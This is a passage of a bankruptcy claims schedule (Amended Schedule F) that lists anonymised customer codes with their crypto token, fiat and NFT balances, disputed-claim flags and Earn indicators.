| 07356194 | | BTC[.00012334], DOGE[1], USD[5.00] | | |
| 07356195 | | BRZ[3], DOGE[16747.64495011], ETH[1.29386235], ETHW[1.29331899], GRT[1], USD[0.00], USDT[1.06345693] | Yes | |
| 07356196 | | USD[10.00] | | |
| 07356197 | | USD[10.00] | | |
| 07356199 | | USD[0.00] | | |
| 07356200 | | USD[10.00] | | |
| 07356201 | | CUSDT[4], DOGE[18.12536883], SOL[.0000196], TRX[1], USD[0.00] | Yes | |
| 07356202 | | CUSDT[2], USD[0.00] | | |
| 07356203 | | USD[0.00] | | |
| 07356204 | | MATIC[5.23462009], TRX[.00002091], USD[0.00] | Yes | |
| 07356205 | | BRZ[2], CUSDT[1], DOGE[12223.87636975], GRT[5.73430634], TRX[3401.73700824], USD[0.00] | Yes | |
| 07356207 | | USD[11.01] | Yes | |
| 07356208 | | USD[0.02] | | |
| 07356209 | | LTC[.1495438], SOL[.04050694], SUSHI[.1], USD[2.42], USDT[7.00000005] | | |
| 07356210 | | GRT[1], LTC[.94949356], MATIC[0], SHIB[3], USD[0.00], USDT[0] | Yes | |
| 07356211 | | CUSDT[1], USD[12.29] | | |
| 07356212 | | SHIB[1124.35797342], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356215 | | BTC[0], USD[0.01] | | |
| 07356216 | | USD[10.00] | | |
| 07356217 | | USD[10.00] | | |
| 07356218 | | USD[10.00] | | |
| 07356219 | | BRZ[1], DOGE[16.96613138], EUR[0.00], GRT[0], TRX[0], USD[0.00] | | |
| 07356220 | | DOGE[779.83212516], TRX[1], USD[6.43] | | |
| 07356221 | | DOGE[2], USD[8.92] | | |
| 07356222 | | USD[10.00] | | |
| 07356223 | | USD[10.00] | | |
| 07356224 | | CUSDT[1], TRX[1], USD[0.01] | Yes | |
| 07356225 | | USD[10.00] | | |
| 07356227 | | USD[10.00] | | |
| 07356228 | | USD[10.00] | | |
| 07356229 | | USD[10.00] | | |
| 07356230 | | CUSDT[4], DOGE[1], SHIB[6.52601641], TRX[3], USD[0.00] | Yes | |
| 07356231 | | CUSDT[1], DOGE[289.02976416], TRX[1], USD[0.00] | Yes | |
| 07356233 | | USD[10.00] | | |
| 07356234 | | USD[10.00] | | |
| 07356235 | | USD[10.00] | | |
| 07356236 | | USD[10.00] | | |
| 07356237 | | USD[10.00] | | |
| 07356238 | | USD[10.00] | | |
| 07356239 | | USD[10.00] | | |
| 07356240 | | BAT[.00005425], BTC[.0000175], CUSDT[3], DOGE[0.09499688], ETH[.00000341], ETHW[.00000341], LTC[0.00006819], SUSHI[.00000098], TRX[2], UNI[.00550264], USD[0.16] | | |
| 07356241 | | DOGE[1], ETHW[.00056281], USD[78.88] | | |
| 07356242 | | GRT[0], USD[0.00], USDT[0.00000001] | | |
| 07356243 | | USD[5.01] | | |
| 07356244 | | BCH[.28445273], BTC[.01323683], CUSDT[7], DOGE[306.91270405], ETH[.07345362], ETHW[.07345362], SUSHI[11.01365693], TRX[3], USD[730.54] | | |
| 07356245 | | BTC[.00026443], CUSDT[8], DOGE[2934.35296178], ETH[.01350719], ETHW[.01350719], SHIB[2], TRX[1], USD[34.96] | | |
| 07356246 | | DOGE[0], LTC[0], SUSHI[0], USD[0.00] | | |
| 07356247 | | BRZ[1], USD[1.97] | | |
| 07356248 | | DOGE[1], LTC[.05226487], TRX[251.23591745], USD[0.00] | | |
| 07356249 | | USD[20.00] | | |
| 07356250 | | USD[10.00] | | |
| 07356251 | | CUSDT[476.11648668], DOGE[1409.4216307], USD[0.76] | | |
| 07356252 | | DOGE[0.97207141], USD[0.25] | | |
| 07356253 | | USD[10.00] | | |
| 07356254 | | DOGE[5371.27089563], TRX[4506.95193487], USD[0.00] | Yes | |
| 07356256 | | USD[0.00] | | |
| 07356257 | | TRX[1], USD[0.00], USDT[0] | Yes | |
| 07356258 | | USD[0.00] | | |
| 07356259 | | USD[10.00] | | |
| 07356260 | | USD[10.00] | | |
| 07356261 | | CUSDT[11], DOGE[.38857357], TRX[5], USD[0.38], USDT[1.08427641] | Yes | |
| 07356263 | | TRX[.51965238], USD[0.00] | | |
| 07356264 | | USD[10.00] | | |
| 07356265 | | CUSDT[4], GRT[0], SOL[0.28912869], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07356266 | | USD[10.00] | | |
| 07356267 | | DOGE[1204.25980932], TRX[2], USD[0.00] | | |
| 07356268 | | BAT[1.01655549], CUSDT[3], DOGE[1], GRT[2.08234366], TRX[4], USD[8.82] | Yes | |
| 07356269 | | USD[10.00] | | |
| 07356270 | | DOGE[1], USD[0.01] | | |
| 07356271 | | CUSDT[2], DOGE[1179.87176081], USD[42.00] | | |
| 07356272 | Contingent, Disputed | USD[0.06] | | |
| 07356273 | | USD[10.00] | | |
| 07356274 | | DOGE[.27946577], TRX[1], USD[5.69] | | |
| 07356277 | | BRZ[1], DOGE[6734.1863123], USD[5.00] | | |
| 07356278 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356279 | | BRZ[1], ETH[.00862043], ETHW[.00862043], TRX[2], USD[6.60] | | |
| 07356280 | | USD[10.00] | | |
| 07356281 | | CUSDT[1], DOGE[1.01544381], USD[0.00] | | |
| 07356284 | | DOGE[0], SHIB[2027.38324195], USD[0.00] | | |
| 07356285 | | USD[0.00] | | |
| 07356286 | | DOGE[.00066991], USD[0.00] | | |
| 07356287 | | BAT[1], BRZ[3], DOGE[0], ETH[0], TRX[2], USD[16.48], USDT[1] | | |
| 07356288 | | CUSDT[1], DOGE[219.99998040], SHIB[605296.23207183], TRX[1], USD[0.00] | | |
| 07356289 | | DOGE[27.70623258], USD[0.00] | | |
| 07356290 | | USD[10.00] | | |
| 07356291 | | USD[10.00] | | |
| 07356292 | | USDT[0.00001449] | | |
| 07356293 | | BCH[0], BRZ[4], BTC[0], CUSDT[8], DOGE[0], LTC[0], SOL[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07356294 | | BAT[2.08973524], BRZ[6.53913378], CUSDT[5], DOGE[7.24517574], ETH[.73677985], ETHW[.73647027], GRT[1.00367791], LINK[2.18262969], TRX[7], USD[15.75], USDT[3.27863836] | Yes | |
| 07356295 | | BTC[.00002382], CUSDT[3], DOGE[22349971], SHIB[2], USD[164.80] | | |
| 07356296 | | CUSDT[3], TRX[4], USD[0.01] | | |
| 07356297 | | DOGE[6920.502], ETH[.00022], ETHW[.00022], LTC[25.13464], MATIC[492.92], SUSHI[140.452], UNI[56.3], USD[4.87], USDT[0.00174327] | | |
| 07356298 | | AAVE[0], AVAX[0], BAT[2], BCH[0], BRZ[6], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SHIB[61137.00447234], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[1] | | |
| 07356299 | | USD[10.00] | | |
| 07356300 | | DOGE[1], USD[0.00] | | |
| 07356301 | | USD[10.00] | | |
| 07356302 | | CUSDT[1], DOGE[3], TRX[3], USD[0.00], USDT[0] | | |
| 07356303 | | BRZ[1], TRX[2], USD[0.00] | Yes | |
| 07356304 | | USD[10.00] | | |
| 07356305 | | BAT[1], CUSDT[3], ETH[0], GRT[1], TRX[3], USD[0.00], USDT[0] | | |
| 07356306 | | CUSDT[4], DOGE[.73363755], ETH[.00005179], ETHW[.00005179], USD[0.01] | | |
| 07356307 | | BRZ[2], DOGE[.09596169], GRT[1], USD[0.00] | | |
| 07356308 | | BAT[80.29927205], BTC[.00083562], CUSDT[2], TRX[2], USD[0.00] | | |
| 07356309 | | USD[10.00] | | |
| 07356310 | | USD[10.00] | | |
| 07356311 | | CUSDT[2], DOGE[721.48293747], ETH[.02748004], ETHW[.02748004], USD[0.95] | | |
| 07356312 | | USD[10.00] | | |
| 07356313 | | SOL[.640965559], USD[0.00] | | |
| 07356314 | | USD[10.00] | | |
| 07356315 | | BAT[2], CUSDT[2], DOGE[1], GRT[1], USD[0.01] | | |
| 07356316 | | BRZ[1], CUSDT[1], DOGE[161.28695686], GRT[.14789828], TRX[3.19514916], USD[0.01] | | |
| 07356317 | | BRZ[1], CUSDT[7], TRX[4], USD[0.00] | | |
| 07356318 | | USD[11.05] | Yes | |
| 07356320 | | DOGE[27.62663323], USD[0.00] | | |
| 07356321 | | USD[10.00] | | |
| 07356323 | | CUSDT[11], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07356324 | | USD[10.00] | | |
| 07356325 | | USD[0.00], USDT[0] | | |
| 07356326 | | DOGE[55.95182958], USD[0.00] | Yes | |
| 07356328 | | CUSDT[2], DOGE[120.93646684], USD[0.00] | | |
| 07356330 | | ETHW[.07566107], USD[0.00] | | |
| 07356331 | | DOGE[116.76008634], USD[10.36] | | |
| 07356332 | | USD[10.00] | | |
| 07356333 | | BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.21] | | |
| 07356334 | | ETH[.00571044], ETHW[.00571044], USD[0.00] | | |
| 07356335 | | BTC[.00000002], CUSDT[3], SHIB[1071947.28855317], USD[0.00] | Yes | |
| 07356336 | | USD[11.07] | Yes | |
| 07356337 | | USD[10.00] | | |
| 07356338 | | BRZ[1], CUSDT[1], GBP[0.00], USD[10.00] | | |
| 07356340 | | USD[0.00] | | |
| 07356341 | | BTC[.00401139], CUSDT[4], DOGE[9054.55845225], ETH[.00617389], ETHW[.00609181], LTC[.0489736], SHIB[1], TRX[2], USD[624.41] | Yes | |
| 07356342 | | BRZ[1], CUSDT[1], DOGE[170.87334603], USD[0.13] | | |
| 07356344 | | BRZ[4], CUSDT[2], DOGE[3], TRX[1], USD[0.02] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356345 | | DOGE[4318.79845971], SOL[12.10729709], USD[0.00] | Yes | |
| 07356346 | | USD[0.01] | | |
| 07356347 | | USD[10.00] | | |
| 07356348 | | SOL[.37856837], USD[0.00] | | |
| 07356349 | | USD[10.00] | | |
| 07356351 | | DOGE[1], USD[0.01] | | |
| 07356353 | | USD[10.00] | | |
| 07356354 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07356355 | | BTC[.00044465], DOGE[168.5572895], USD[0.00] | | |
| 07356356 | | USD[10.00] | | |
| 07356357 | | BAT[335.64986818], DOGE[658.34398284], TRX[3060.93761488], USD[0.00] | | |
| 07356358 | | USD[10.00] | | |
| 07356359 | | BRZ[1], DOGE[209.24640313], GRT[4.27393522], USD[0.00] | | |
| 07356361 | | BRZ[1], TRX[2], USD[0.01] | | |
| 07356363 | | DOGE[104.41779127], USD[0.01] | | |
| 07356364 | | USD[10.00] | | |
| 07356365 | | TRX[163.14240994], USD[0.00] | | |
| 07356366 | | USD[10.00] | | |
| 07356367 | | CUSDT[106.42408476], DOGE[6052.969489], SHIB[2172387.36546537], TRX[12.14681773], USD[0.27] | Yes | |
| 07356369 | | USD[10.00] | | |
| 07356370 | | DOGE[183.63361766], USD[5.00] | | |
| 07356371 | | USD[10.00] | | |
| 07356372 | | DOGE[203.55968182], USD[34.01], USDT[0] | | |
| 07356373 | | BAT[33.90939863], BRZ[1], CUSDT[7], DOGE[1188.74515224], GRT[111.18900997], LTC[.34049209], MATIC[11.10760439], SUSHI[1.34293627], TRX[449.0624421], UNI[.50888642], USD[4.68] | | |
| 07356375 | | BRZ[0], DOGE[0], ETH[0], GRT[0], SHIB[1], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07356376 | | DOGE[244.85720295], USD[10.00] | | |
| 07356377 | | SOL[41.74903197], USD[0.00] | | |
| 07356379 | | USD[10.00] | | |
| 07356380 | | DOGE[152.5332183], USD[0.00] | | |
| 07356382 | | BTC[.00071593], DOGE[752.30071945], USD[0.02] | Yes | |
| 07356384 | | DOGE[10.98236316], TRX[19.56611616], USD[4.58] | | |
| 07356385 | | USD[10.00] | | |
| 07356386 | | AUD[0.00], USD[0.00], USDT[0] | | |
| 07356387 | | USD[10.00] | | |
| 07356388 | | BCH[.00902985], BRZ[1], BTC[.00027709], CUSDT[1], DOGE[104.76939642], GRT[1.29191219], TRX[1], USD[0.01], USDT[1] | | |
| 07356389 | | DOGE[1542.43372001], TRX[1], USD[10.00] | | |
| 07356390 | | CUSDT[2], USD[0.01] | | |
| 07356392 | | ETH[0], ETHW[0], USD[0.00], USDT[0] | Yes | |
| 07356395 | | CUSDT[2], SHIB[1], USD[56.62] | | |
| 07356396 | | TRX[184.79260356], USD[0.00] | | |
| 07356397 | | USD[10.00] | | |
| 07356398 | | BRZ[1], USD[0.00] | | |
| 07356399 | | CUSDT[1], DOGE[2], TRX[1], USD[0.01] | | |
| 07356400 | | USD[10.00] | | |
| 07356401 | | USD[10.00] | | |
| 07356402 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07356404 | | USD[10.00] | | |
| 07356405 | | DOGE[134.865], USD[0.06] | | |
| 07356406 | | USD[10.00] | | |
| 07356407 | | DOGE[1], GRT[.00003865], USD[13.16] | | |
| 07356408 | | USD[10.00] | | |
| 07356409 | | DOGE[40.79937678], USD[0.00] | Yes | |
| 07356410 | | DOGE[2], TRX[.0000074], USD[0.00] | | |
| 07356411 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07356412 | | USD[10.00] | | |
| 07356413 | | USD[10.00] | | |
| 07356415 | | DOGE[7154.09411473], USD[0.30] | | |
| 07356416 | | BRZ[1], CUSDT[1], TRX[2], USD[227.81] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356417 | | USD[0.00] | | |
| 07356420 | | USD[10.00] | | |
| 07356422 | | USD[0.01] | | |
| 07356423 | | DOGE[1], TRX[1], USD[10.00] | | |
| 07356424 | | USD[10.00] | | |
| 07356425 | | CUSDT[2], DOGE[22.83780619], TRX[21974.64419977], USD[0.40], USDT[1] | | |
| 07356428 | | USD[10.00] | | |
| 07356429 | | BTC[0], CUSDT[1], DOGE[141.46342536], USD[0.00] | | |
| 07356430 | | TRX[5749.042075], USD[110.00] | | |
| 07356431 | | CUSDT[6], DOGE[4827.40157686], SHIB[339997.28002175], TRX[4], USD[0.00] | | |
| 07356433 | | USD[10.00] | | |
| 07356434 | | CUSDT[1], DOGE[.00000416], USD[0.00] | | |
| 07356435 | | DOGE[216.52187884], TRX[54.08859278], USD[0.00] | | |
| 07356436 | | DOGE[1], USD[0.00] | | |
| 07356437 | | BCH[0.00000024], TRX[0], USD[0.00] | Yes | |
| 07356438 | | TRX[1], USD[0.00] | | |
| 07356439 | | USD[10.00] | | |
| 07356440 | | AAVE[0], AVAX[0], BAT[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SHIB[8], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00014154], YFI[0] | Yes | |
| 07356441 | | CUSDT[1], DOGE[0.99998839], TRX[1], USD[0.00] | | |
| 07356443 | | DOGE[686.98969454], USD[22.01] | | |
| 07356444 | | DAI[.00026828], DOGE[165.35407886], USD[0.00] | | |
| 07356445 | | USD[10.00] | | |
| 07356447 | | DOGE[15.40570495], USD[0.00] | | |
| 07356448 | | BTC[0.00216744], CUSDT[1], TRX[267.99131228], USD[0.00] | | |
| 07356449 | | BRZ[1], DOGE[2.00000035], TRX[1], USD[0.00] | | |
| 07356450 | | BRZ[1], DOGE[0], GRT[0], SOL[0], USD[0.00], USDT[1] | | |
| 07356451 | | DOGE[.24054824], USD[0.94] | | |
| 07356452 | | CUSDT[1], DOGE[1.27444569], TRX[1], USD[0.00] | | |
| 07356453 | | ETH[.00531105], ETHW[.00531105], USD[0.00] | | |
| 07356454 | | CUSDT[1], LINK[0], USD[0.00] | | |
| 07356455 | | USD[10.00] | | |
| 07356456 | | USD[10.00] | | |
| 07356458 | | CUSDT[13], DOGE[682.41453215], USD[0.00], USDT[0] | | |
| 07356459 | | USD[10.00] | | |
| 07356460 | Contingent, Disputed | USD[10.00] | | |
| 07356462 | | BRZ[0], CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07356464 | | CUSDT[1], DOGE[1935.92633508], ETH[0], ETHW[0], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07356465 | | USD[10.00] | | |
| 07356466 | | USD[10.00] | | |
| 07356467 | | USD[10.00] | | |
| 07356468 | | BRZ[1], CUSDT[18], TRX[8.99885856], USD[0.00], USDT[0] | Yes | |
| 07356470 | | USD[0.01] | | |
| 07356471 | | USD[10.00] | | |
| 07356472 | | USD[10.00] | | |
| 07356473 | | USD[10.00] | | |
| 07356474 | | CUSDT[1700.09409492], GRT[5.71368319], TRX[113.76377085], UNI[.31421074], USD[0.00], USDT[1] | | |
| 07356476 | | USD[10.00] | | |
| 07356477 | | BF_POINT[100], CUSDT[2], DOGE[2549.14800253], USD[0.00] | | |
| 07356478 | | BRZ[2], CUSDT[8], DOGE[.00711651], SHIB[27199.50869692], USD[0.61] | Yes | |
| 07356479 | | CUSDT[1], USD[0.01] | | |
| 07356480 | | USD[0.00] | | |
| 07356481 | | DOGE[566.48396965], USD[0.00] | | |
| 07356482 | | BTC[.00198883], CUSDT[16], DOGE[13473.77985963], LINK[3.61628672], MATIC[23.65956935], SHIB[2195369.78635916], SOL[1.35445139], SUSHI[6.06706583], TRX[6212.10485441], USD[10.39] | Yes | |
| 07356483 | | SHIB[1], SOL[0], TRX[0], USD[0.01] | Yes | |
| 07356484 | | USD[10.00] | | |
| 07356485 | | USD[10.00] | | |
| 07356486 | | USD[10.00] | | |
| 07356487 | | BTC[.00064167], DOGE[624.41757541], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356488 | | USD[10.00] | | |
| 07356489 | | CUSDT[8], DOGE[3], TRX[2438.94646959], USD[0.00] | | |
| 07356490 | | CUSDT[1], USD[0.01] | | |
| 07356491 | | USD[10.00] | | |
| 07356492 | | USD[10.00] | | |
| 07356493 | | BCH[0], DOGE[4.03551732], ETH[0], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07356494 | | BTC[.00394769], CUSDT[3], DOGE[7776.42325012], SUSHI[4.1772693], TRX[1], USD[0.00] | Yes | |
| 07356495 | | USD[10.00] | | |
| 07356496 | | USD[10.00] | | |
| 07356497 | | DOGE[0], SUSHI[0], USD[2.09] | Yes | |
| 07356498 | | BTC[0.00007367], DOGE[30.70076647], TRX[1], USD[0.20] | Yes | |
| 07356502 | | USD[10.00] | | |
| 07356503 | | NFT (538467834342779322/CryptoFabula #278)[1], USD[0.30] | | |
| 07356504 | | BAT[.00004828], BRZ[0.00060299], BTC[0], DOGE[1], SUSHI[.0000044], TRX[4.00003034], USD[0.00] | | |
| 07356505 | | USD[10.00] | | |
| 07356506 | | BAT[1], CUSDT[1], USD[10.06] | | |
| 07356507 | | USD[10.00] | | |
| 07356508 | | USD[10.00] | | |
| 07356509 | | BTC[0], ETH[0], LINK[0], MKR[0], SHIB[1], SOL[0.01944602], USD[0.00], USDT[0.00000001] | Yes | |
| 07356510 | | BRZ[1], DOGE[5487.53339967], USD[10.00] | | |
| 07356511 | | USD[10.00] | | |
| 07356513 | | BRZ[0], CUSDT[1], TRX[0], USD[0.53], USDT[0.00001908] | | |
| 07356515 | | BRZ[1], USD[0.01] | | |
| 07356516 | | USD[10.00] | | |
| 07356517 | | CUSDT[2], DOGE[1], USD[0.62] | | |
| 07356518 | | BRZ[1], CUSDT[2], GRT[2], USD[0.00], USDT[1] | | |
| 07356519 | | BTC[0], ETH[0], SOL[0], USD[0.00] | | |
| 07356520 | | BRZ[1], ETH[.00169953], ETHW[.00169953], TRX[1], USD[0.00] | | |
| 07356521 | | USD[10.00] | | |
| 07356522 | | BTC[0], CUSDT[6], DOGE[1415.97685725], ETH[0], LTC[0], TRX[3], USD[0.00] | | |
| 07356523 | | BAT[566.35780342], BRZ[12], CUSDT[65], DOGE[3304.44642461], ETH[.00253445], ETHW[.00253445], GRT[0], LINK[.02807692], SUSHI[55.32140172], TRX[7], UNI[20.9546504], USD[0.00], USDT[0.46608678] | | |
| 07356524 | | CUSDT[942.82666158], TRX[1], USD[0.00] | | |
| 07356525 | | CUSDT[1], TRX[1], USD[0.16] | Yes | |
| 07356526 | | CUSDT[1], DOGE[1.00006252], TRX[1], USD[0.01] | | |
| 07356527 | | USD[10.00] | | |
| 07356528 | | USD[10.00] | | |
| 07356529 | | DOGE[374.126], SUSHI[15.438], USD[0.00] | | |
| 07356530 | | USD[10.00] | | |
| 07356531 | | USD[10.00] | | |
| 07356532 | | USD[10.00] | | |
| 07356533 | | CUSDT[1], DOGE[1], USD[25.44] | | |
| 07356534 | | USD[10.85] | Yes | |
| 07356535 | | BRZ[1], DOGE[4791.92732754], USD[10.00] | | |
| 07356536 | | DOGE[1200.60461032], USD[40.00] | | |
| 07356538 | | CUSDT[1], DOGE[4878.98361950], TRX[1], USD[0.00] | | |
| 07356540 | | BRZ[1], CUSDT[5], DOGE[1], TRX[5], USD[0.67], USDT[0] | | |
| 07356541 | | USD[10.00] | | |
| 07356542 | | DOGE[357.77016143], USD[0.00] | | |
| 07356544 | | USD[10.00] | | |
| 07356545 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07356546 | | BRZ[1], CUSDT[8], DOGE[1], ETH[.00000011], ETHW[.00000011], TRX[2], USD[0.00] | Yes | |
| 07356547 | | USD[10.00] | | |
| 07356549 | | USD[110.00] | | |
| 07356550 | | USD[10.00] | | |
| 07356551 | | USD[10.00] | | |
| 07356552 | | USD[10.00] | | |
| 07356553 | | USD[10.00] | | |
| 07356554 | | CUSDT[5], DOGE[276.85089498], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356555 | | CUSDT[3], DOGE[9901.18370056], TRX[1], USD[0.00] | | |
| 07356556 | | USD[10.00] | | |
| 07356557 | | BTC[.00009039], DOGE[899.95165386], ETH[.00047584], ETHW[.00047584], USD[13.76] | | |
| 07356558 | | CUSDT[5], DOGE[86.03087933], TRX[2], USD[0.01] | Yes | |
| 07356559 | | USD[10.00] | | |
| 07356560 | | USD[10.00] | | |
| 07356561 | | BRZ[1], CUSDT[3], DOGE[0], TRX[1], USD[0.00] | | |
| 07356562 | | BAT[24.53662058], DOGE[312.97745743], USD[0.00] | Yes | |
| 07356563 | | CUSDT[1], USD[0.01] | | |
| 07356564 | | USD[10.00] | | |
| 07356565 | | DOGE[2739.82326395], TRX[203.52709255], USD[0.00] | | |
| 07356566 | | USD[10.00] | | |
| 07356567 | | TRX[1], USD[0.00] | | |
| 07356568 | | CUSDT[1], USD[10.00] | | |
| 07356569 | | USD[10.00] | | |
| 07356570 | | CUSDT[3], DOGE[601.22739109], TRX[1], USD[0.00] | | |
| 07356571 | | BRZ[1], CUSDT[3], DOGE[1.29593906], USD[0.01] | | |
| 07356572 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07356573 | | BRZ[2], GRT[.64945498], KSHIB[.00076311], USD[0.00] | | |
| 07356574 | | USD[10.00] | | |
| 07356575 | | CUSDT[1], DOGE[0], TRX[8.00004225], USD[0.00] | | |
| 07356576 | | BRZ[1], CUSDT[2], DOGE[140.43188698], TRX[2], USD[0.00] | | |
| 07356577 | | USD[10.00] | | |
| 07356578 | | CUSDT[1], USD[0.00] | | |
| 07356579 | | BCH[0], BRZ[0], BTC[0], DOGE[0], GRT[0], LINK[0], LTC[0], SOL[0], UNI[0], USD[0.00] | | |
| 07356580 | | DOGE[1], USD[0.00] | | |
| 07356581 | | BRZ[1], BTC[0], CUSDT[4], TRX[0], USD[0.00] | | |
| 07356582 | | CUSDT[2], DOGE[122.36438179], USD[0.01] | | |
| 07356583 | | USD[10.00] | | |
| 07356584 | | BRZ[0], DOGE[1.16781123], GRT[0], USD[0.00], USDT[0] | | |
| 07356585 | | USD[10.00] | | |
| 07356586 | | ETHW[.000771], MKR[.000582], USD[0.00] | | |
| 07356587 | | USD[10.00] | | |
| 07356588 | | USD[0.00] | | |
| 07356589 | | CUSDT[1], USD[0.01] | | |
| 07356590 | | USD[10.00] | | |
| 07356591 | | USD[10.00] | | |
| 07356592 | | CUSDT[5], DOGE[380.88919601], SHIB[1901292.41319483], TRX[1], USD[0.00] | Yes | |
| 07356593 | | CUSDT[1], TRX[2], USD[318.58] | | |
| 07356594 | | BCH[0], BTC[0], DOGE[1.0672553], USD[0.00], USDT[0] | Yes | |
| 07356595 | | USD[10.00] | | |
| 07356596 | | CUSDT[1], GRT[1], USD[0.00] | | |
| 07356597 | | CUSDT[1], DOGE[9615.20350819], GRT[3.97200002], USD[0.00] | Yes | |
| 07356598 | | CUSDT[0], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07356599 | | BAT[1], CUSDT[1], DOGE[15331.43230956], TRX[2], USD[0.00] | | |
| 07356601 | | CUSDT[1], SOL[1.19265596], USD[0.00] | | |
| 07356602 | | BAT[1], BRZ[2], CUSDT[15], DOGE[1.82854497], TRX[5.00004609], USD[0.00] | | |
| 07356603 | | USD[10.00] | | |
| 07356604 | | DOGE[123.78624116], USD[0.00] | | |
| 07356605 | | USD[10.00] | | |
| 07356606 | | CUSDT[1], DOGE[.81348257], TRX[1], USD[0.00] | | |
| 07356607 | | USD[10.00] | | |
| 07356608 | | USD[10.00] | | |
| 07356609 | | BAT[3.19742931], BRZ[1], BTC[0], CUSDT[1], DOGE[1659.84772821], GRT[.00196925], TRX[1], USD[0.00], USDT[1.07799689] | Yes | |
| 07356610 | | CUSDT[1], DOGE[1345.00893457], USD[10.00] | | |
| 07356611 | | USD[10.00] | | |
| 07356612 | | SHIB[341.82991713], USD[0.00] | Yes | |
| 07356613 | | BCH[0], BRZ[3], BTC[0], CUSDT[15.85687595], DAI[.00098814], DOGE[0.00005252], ETH[0.00000008], ETHW[0.00000008], GRT[.01565618], LINK[.00043820], LTC[0.00000006], SOL[0], TRX[0.00003131], UNI[0.00090740], USD[0.00], USDT[0.00015928], YFI[0] | | |

Amended Schedule F Top 50,000 priority unsecured customer claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07356614 | | USD[10.00] | | |
| 07356615 | | USD[10.00] | | |
| 07356616 | | BTC[0, DOGE[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07356617 | | USD[10.00] | | |
| 07356618 | | BTC[.0356065], CUSDT[4], USD[0.00] | Yes | |
| 07356619 | | USD[10.00] | | |
| 07356620 | | BRZ[0], BTC[0], DOGE[2.60088910], ETH[0], LTC[0], SHIB[181.98090602], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07356621 | | BAT[0], CUSDT[3], DOGE[0], ETH[0], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07356622 | | BTC[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07356624 | | DOGE[1], USD[0.00] | | |
| 07356625 | | USD[10.00] | | |
| 07356626 | | DOGE[1.04722415], USD[0.00] | | |
| 07356627 | | BTC[0], CUSDT[3], ETH[0], USD[0.00] | | |
| 07356628 | | USD[10.00] | | |
| 07356629 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07356630 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07356631 | | BAT[1], CUSDT[2], DOGE[221.53602896], TRX[3], USD[37.30] | | |
| 07356633 | | USD[10.00] | | |
| 07356634 | | BTC[0], DOGE[0], USD[0.01] | | |
| 07356635 | | DOGE[0], ETH[.00037476], ETHW[.00037476], USD[0.00] | Yes | |
| 07356636 | | USD[0.00] | | |
| 07356637 | | TRX[1], USD[161.75] | | |
| 07356638 | | CUSDT[1], DOGE[33.01537861], USD[0.00] | | |
| 07356639 | | USD[10.00] | | |
| 07356640 | | TRX[171.00217343], USD[1.00] | | |
| 07356641 | | USD[11.00] | Yes | |
| 07356642 | | CUSDT[7], DOGE[1], TRX[2], USD[0.00] | | |
| 07356643 | | USD[10.00] | | |
| 07356644 | | BAT[1], BRZ[2], CUSDT[13], SHIB[164.68939327], TRX[1], USD[0.91] | Yes | |
| 07356645 | | CUSDT[3], DOGE[1312.92693718], USD[0.01] | | |
| 07356646 | | SUSHI[.6333028], USD[0.00] | | |
| 07356647 | | BAT[0], BCH[0], BRZ[0], DOGE[2], SUSHI[0], USD[0.00], USDT[0] | | |
| 07356648 | | DOGE[134.85925683], USD[0.00] | | |
| 07356649 | | BRZ[2], CUSDT[4], DOGE[115.56083859], KSHIB[172.93405626], SHIB[345723.6940363], TRX[4], USD[0.00] | | |
| 07356650 | | DOGE[2], USD[0.00] | | |
| 07356651 | | USD[10.00] | | |
| 07356652 | | USD[0.00] | | |
| 07356653 | | USD[10.00] | | |
| 07356654 | | USD[10.00] | | |
| 07356655 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07356656 | | DOGE[139.83158683], USD[0.00] | | |
| 07356658 | | USD[10.00] | | |
| 07356659 | | USD[10.00] | | |
